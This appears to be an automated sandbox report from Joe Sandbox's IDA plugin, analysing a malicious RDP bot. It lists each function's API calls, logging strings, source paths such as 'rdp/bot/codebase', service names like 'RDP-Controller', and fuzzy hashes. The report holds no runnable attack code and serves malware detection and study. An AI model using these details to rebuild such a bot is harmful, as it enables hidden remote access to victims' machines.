Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
API String ID: 546114577-3142219161
Opcode ID: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
Instruction ID: 513430eb6ac1e6cff6ac8cc234575a1c6ce3b14a7c1b0d75befee7327d633898
Opcode Fuzzy Hash: dc7b3edb1b96fafe6ace2f878cfc270cb54aaa187ae3b6ec2148f67baf07579a
Instruction Fuzzy Hash: 6B41F791F0C72792FB309F14E8C03B822A4DF05348F605033CAEE862B1AE5DB9A59F45

Function 00007FF76A904688 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF76A9046BC

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

GetLastError.KERNEL32 ref: 00007FF76A90481B

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A90472A, 00007FF76A90475D, 00007FF76A90478D, 00007FF76A9047BD
(xpath != NULL), xrefs: 00007FF76A90474F
(path != NULL), xrefs: 00007FF76A90471C
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF76A9046F7
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF76A90490B
fs_path_expand, xrefs: 00007FF76A9046F0, 00007FF76A904723, 00007FF76A904756, 00007FF76A904786, 00007FF76A9047B6, 00007FF76A9047E8, 00007FF76A904829, 00007FF76A904904
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF76A904830
((*xpath_sz) > 0), xrefs: 00007FF76A9047AF
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF76A9047EF
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A904715, 00007FF76A904748, 00007FF76A904778, 00007FF76A9047A8
(xpath_sz != NULL), xrefs: 00007FF76A90477F

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2273971785
Opcode ID: 6c4ab4fc53780e0b150f997a2720910844ef62c52006fc2f546de1764606101c
Instruction ID: acb5807dfe5760bd7dc8ffda71e333ce613b054810645eb0166736fccf53e0c4
Opcode Fuzzy Hash: 6c4ab4fc53780e0b150f997a2720910844ef62c52006fc2f546de1764606101c
Instruction Fuzzy Hash: CD617D61E0C747D9FA21BB14E8803B89252AFA1788FF445BAD95DC7194EE3CED468720

Function 00007FFE0EB46C3D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 134stringtimeCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0EB46C9D
strlen.MSVCRT ref: 00007FFE0EB46CBF
strlen.MSVCRT ref: 00007FFE0EB46CD3
strlen.MSVCRT ref: 00007FFE0EB46D49
strlen.MSVCRT ref: 00007FFE0EB46D65
strlen.MSVCRT ref: 00007FFE0EB46D76
CompareFileTime.KERNEL32 ref: 00007FFE0EB46DD1

Strings

termsrv3, xrefs: 00007FFE0EB46CDB
v32.ini, xrefs: 00007FFE0EB46CE8
termsrv3, xrefs: 00007FFE0EB46D7E
%ProgramFiles%\RDP\, xrefs: 00007FFE0EB46D2B
TermService, xrefs: 00007FFE0EB46E20
v32.ini, xrefs: 00007FFE0EB46D8B

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strlen$CompareFileTime
String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
API String ID: 342285119-844192579
Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
Instruction ID: aa831c8a0f45772ed7ff321e86cebc49aeb8f68307bdae3b20cff4b5e4256a1c
Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
Instruction Fuzzy Hash: 5051B1A1B0C78341FB31AE65A8507BA5791DF867C4F480031DACE4B7AAEE7CE9458F00

Function 00007FF76A908A03 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00007FF76A908A80
GetLastError.KERNEL32 ref: 00007FF76A908AB3

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

P, xrefs: 00007FF76A908B40
[I] (%s) -> %s, xrefs: 00007FF76A908BB4, 00007FF76A908BE4
, xrefs: 00007FF76A908AD1
~, xrefs: 00007FF76A908B37
svc_main, xrefs: 00007FF76A908ABE, 00007FF76A908BAD, 00007FF76A908BDD
[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu), xrefs: 00007FF76A908AC5
Service running, xrefs: 00007FF76A908BA6
Service stopping, xrefs: 00007FF76A908BD6
RDP-Controller, xrefs: 00007FF76A908A79

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
API String ID: 3562457520-1478336053
Opcode ID: 52f60b2fdd6b7a4117ffb17ff41153f903985ef64f4eb76314e0509221f3b0aa
Instruction ID: a0f275d757cbb48f508f98da0c585b21caafb13514197bf5b88eb882d4fa64aa
Opcode Fuzzy Hash: 52f60b2fdd6b7a4117ffb17ff41153f903985ef64f4eb76314e0509221f3b0aa
Instruction Fuzzy Hash: B4510250F0CB03C6FB69776594903B9F1949F14394FB0C0BAC50ECAAD2DE6DA8869372

Function 00007FFE0E16D110 Relevance: 21.1, APIs: 6, Strings: 8, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0E16D1AE
GetProcessHeap.KERNEL32 ref: 00007FFE0E16D1E1
HeapAlloc.KERNEL32 ref: 00007FFE0E16D1F2
strcpy.MSVCRT ref: 00007FFE0E16D24B
GetProcessHeap.KERNEL32 ref: 00007FFE0E16D261
HeapFree.KERNEL32 ref: 00007FFE0E16D272

Strings

t:, xrefs: 00007FFE0E16D128
-LTCMAS-, xrefs: 00007FFE0E16D202
XESS, xrefs: 00007FFE0E16D21E
[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx), xrefs: 00007FFE0E16D1D2
on_tick_expiry, xrefs: 00007FFE0E16D1CB
-LTCSES-, xrefs: 00007FFE0E16D210
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E16D287
mem_alloc, xrefs: 00007FFE0E16D280

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$Process$AllocFreestrcpystrlen
String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry$t:
API String ID: 925994320-4234522349
Opcode ID: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
Instruction ID: 45bbc7bd6f863d5935f3cfa0eb40394e9e50792d438222bb1db7b9f00b197065
Opcode Fuzzy Hash: 711575fe787fea8fe66afaf681d5257aa99ee325125eba93f4346aa83786c236
Instruction Fuzzy Hash: 8D418CA1A09A4786FA40AB55E84037927B1BF88B94F55403AEEDE073B7DE7CE945C340

Function 00007FF76A9044F5 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF76A904520
strlen.MSVCRT ref: 00007FF76A904549
strlen.MSVCRT ref: 00007FF76A904555
strlen.MSVCRT ref: 00007FF76A90456B

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9045B3, 00007FF76A9045E3, 00007FF76A904613
NULL, xrefs: 00007FF76A90467F
(path != NULL), xrefs: 00007FF76A9045A5
(path_sz != NULL), xrefs: 00007FF76A9045D5
fs_path_temp, xrefs: 00007FF76A904579, 00007FF76A9045AC, 00007FF76A9045DC, 00007FF76A90460C, 00007FF76A904646
((*path_sz) > 0), xrefs: 00007FF76A904605
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF76A904580
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A90459E, 00007FF76A9045CE, 00007FF76A9045FE
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF76A90464D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3852240402
Opcode ID: b4405722874e1bf75b2a03881d607c8f25b0d38e7ca5b041789b72432e3fb928
Instruction ID: bc7236d92e6dcb20663d776c0655216174ab47a1bb8c101345228b41c466f2eb
Opcode Fuzzy Hash: b4405722874e1bf75b2a03881d607c8f25b0d38e7ca5b041789b72432e3fb928
Instruction Fuzzy Hash: E1415161A0CB43D5FB12BF14A5503B8E351BFA47C8FF441BAD55E87295EE3CA9068720

Function 00007FFE0EB48AE0 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EB48BCC

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB48B30, 00007FFE0EB48B63, 00007FFE0EB48B96
(var != NULL), xrefs: 00007FFE0EB48B88
main, xrefs: 00007FFE0EB48AE3
(sec != NULL), xrefs: 00007FFE0EB48B22
ini_get_var, xrefs: 00007FFE0EB48B29, 00007FFE0EB48B5C, 00007FFE0EB48B8F, 00007FFE0EB48BF6, 00007FFE0EB48C3E
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0EB48C45
NULL, xrefs: 00007FFE0EB48C5E, 00007FFE0EB48C67
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB48B1B, 00007FFE0EB48B4E, 00007FFE0EB48B81
version, xrefs: 00007FFE0EB48AE0, 00007FFE0EB48AE4
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0EB48BFD
(name != NULL), xrefs: 00007FFE0EB48B55

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-2349658452
Opcode ID: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
Instruction ID: 06b77c3c7681eb53dae9f8ed27ca40066037d47036496841c89b796c070d4e09
Opcode Fuzzy Hash: b94ec3f647cc81143d64c06ba5fad273c4cfac334e6d0cb33bac54ba1e8291a1
Instruction Fuzzy Hash: FE4128A2A09747D6FA399F44E8407F42360FF84348F548536EAED461B5DF7CA589CB00

Function 00007FFE0E16C450 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E16C53C

Strings

version, xrefs: 00007FFE0E16C450, 00007FFE0E16C454
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0E16C5B5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16C4A0, 00007FFE0E16C4D3, 00007FFE0E16C506
(sec != NULL), xrefs: 00007FFE0E16C492
ini_get_var, xrefs: 00007FFE0E16C499, 00007FFE0E16C4CC, 00007FFE0E16C4FF, 00007FFE0E16C566, 00007FFE0E16C5AE
NULL, xrefs: 00007FFE0E16C5CE, 00007FFE0E16C5D7
main, xrefs: 00007FFE0E16C453
(name != NULL), xrefs: 00007FFE0E16C4C5
(var != NULL), xrefs: 00007FFE0E16C4F8
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0E16C56D
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16C48B, 00007FFE0E16C4BE, 00007FFE0E16C4F1

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-2349658452
Opcode ID: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
Instruction ID: bbcab5e9244ed78a17956093324efe887db5af59465590b7a66326604333b6dc
Opcode Fuzzy Hash: c069338d6658000d34e45bacf4bdf0188d8b796733ade8e0209c51278b0bb835
Instruction Fuzzy Hash: 1D412BF1B09647A6FA108B65E9407F4A360BF44B88F454537EACD461B6EF3CE649C340

Function 00007FFE11EC8590 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11EC867C

Strings

[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE11EC86AD
(sec != NULL), xrefs: 00007FFE11EC85D2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC85E0, 00007FFE11EC8613, 00007FFE11EC8646
version, xrefs: 00007FFE11EC8590, 00007FFE11EC8594
(var != NULL), xrefs: 00007FFE11EC8638
(name != NULL), xrefs: 00007FFE11EC8605
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11EC85CB, 00007FFE11EC85FE, 00007FFE11EC8631
NULL, xrefs: 00007FFE11EC870E, 00007FFE11EC8717
main, xrefs: 00007FFE11EC8593
ini_get_var, xrefs: 00007FFE11EC85D9, 00007FFE11EC860C, 00007FFE11EC863F, 00007FFE11EC86A6, 00007FFE11EC86EE
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE11EC86F5

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-2349658452
Opcode ID: f597a8786ee0ffa638b97d4ecf7a4a4c5361fe08dde7f2cc3011cb9a405a1a5e
Instruction ID: df071a31d06c58a80b13eb41462c257e8012f068f64313ff1c8e3770369d0ed4
Opcode Fuzzy Hash: f597a8786ee0ffa638b97d4ecf7a4a4c5361fe08dde7f2cc3011cb9a405a1a5e
Instruction Fuzzy Hash: E6412A61A08E4792FF118F92EE007F66268BF14378F8455B2EA4D461B5DF7CBA96C300

Function 00007FFE0E16C2C9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E16C3BD

Strings

version, xrefs: 00007FFE0E16C2C9, 00007FFE0E16C2CD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16C319, 00007FFE0E16C34C, 00007FFE0E16C37F
(sec != NULL), xrefs: 00007FFE0E16C371
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0E16C41B
ini_get_sec, xrefs: 00007FFE0E16C312, 00007FFE0E16C345, 00007FFE0E16C378, 00007FFE0E16C3D6, 00007FFE0E16C414
NULL, xrefs: 00007FFE0E16C434
main, xrefs: 00007FFE0E16C2CC
(name != NULL), xrefs: 00007FFE0E16C33E
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0E16C3DD
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16C304, 00007FFE0E16C337, 00007FFE0E16C36A
(ini != NULL), xrefs: 00007FFE0E16C30B

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-693788558
Opcode ID: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
Instruction ID: 964e6340aafc2f67cf2cbb4e23e8c9e7bf39a4d522465e298b29b8f5faf1e9a5
Opcode Fuzzy Hash: fb04181c019cd70a356c0aab54568f0bef338efa7b670cf42f1ecf4a169d6d5e
Instruction Fuzzy Hash: 7B416AB1A08683A5FA10CB15E9403F86361EF44B88F458537DACD0A5B6EF3DE68AC340

Function 00007FFE11EC8409 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11EC84FD

Strings

(sec != NULL), xrefs: 00007FFE11EC84B1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC8459, 00007FFE11EC848C, 00007FFE11EC84BF
version, xrefs: 00007FFE11EC8409, 00007FFE11EC840D
(name != NULL), xrefs: 00007FFE11EC847E
[D] (%s) -> Done(name=%s), xrefs: 00007FFE11EC851D
(ini != NULL), xrefs: 00007FFE11EC844B
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11EC8444, 00007FFE11EC8477, 00007FFE11EC84AA
NULL, xrefs: 00007FFE11EC8574
ini_get_sec, xrefs: 00007FFE11EC8452, 00007FFE11EC8485, 00007FFE11EC84B8, 00007FFE11EC8516, 00007FFE11EC8554
main, xrefs: 00007FFE11EC840C
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE11EC855B

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-693788558
Opcode ID: 0a7fdaa9b34be5affa01a48b6893dbe9fa356ce20ec0ea3afa8898849d8898d0
Instruction ID: 1454c429e4ce94ff460e97266498300c4d695e0e5d86476253619da2d821f2be
Opcode Fuzzy Hash: 0a7fdaa9b34be5affa01a48b6893dbe9fa356ce20ec0ea3afa8898849d8898d0
Instruction Fuzzy Hash: 89414F61A08E4791FF108B82ED007F66268BF503B8F8450B6DA0E0A5B5DF7CFA85C701

Function 00007FFE11501AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11501AC3
LeaveCriticalSection.KERNEL32 ref: 00007FFE11501B47
GetProcessHeap.KERNEL32 ref: 00007FFE11501B7E
HeapAlloc.KERNEL32 ref: 00007FFE11501B92

Strings

[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE11501B69
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11501C16
ebus_subscribe, xrefs: 00007FFE11501AE8, 00007FFE11501B62, 00007FFE11501C0F
mem_alloc, xrefs: 00007FFE11501BDE
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE11501ADA
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11501BE5
(handler != NULL), xrefs: 00007FFE11501AE1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11501AEF

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

